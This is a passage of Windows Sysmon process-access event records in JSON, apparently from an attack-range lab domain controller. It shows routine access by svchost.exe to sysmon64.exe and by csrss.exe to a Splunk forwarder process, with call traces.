C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0512-5F25-0000-0010EF1A1300}","TargetProcessId":"3488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8107,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8108,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:50.950","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:50.950\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 